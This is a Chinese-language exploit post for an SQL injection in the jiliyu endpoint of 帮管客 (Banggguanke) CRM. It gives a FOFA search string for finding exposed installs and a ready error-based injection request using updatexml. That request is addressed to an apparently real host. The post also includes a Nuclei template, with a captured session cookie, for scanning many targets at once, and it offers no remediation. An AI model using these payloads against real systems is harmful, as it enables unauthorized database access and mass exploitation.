漏洞描述:
帮管客CRM是一款基于互联网的客户关系管理软件,主要用于帮助企业管理客户关系、提高销售效率、优化营销策略等。其jiliyu接口存在SQl注入漏洞,攻击者可使用此漏洞通过报错注入获取到数据库数据。
FOFA:
app="帮管客-CRM"
漏洞POC:
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: b.keyikao.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Nuclei 批量检测脚本:
id: template-id
info:
name: Template Name
author: xxx
severity: info
description: description
reference:
- https://
tags: tags
http:
- raw:
- |+
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=%E6%BF%80%E5%8A%B1%E8%AF%AD%E5%88%97%E8%A1%A8&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/2
Host: {{Hostname}}
Cookie: bgk_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224d1c37dc553928c2144e6889a61d2915%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22112.232.108.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A84%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.15%3B+rv%3A123.0%29+Gecko%2F20100101+Firefox%2F123.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1709964694%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D366d726eadd8e1d5b0430fce4642a51149caccc5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
matchers:
- type: word
part: body
words:
- 'XPATH syntax error: '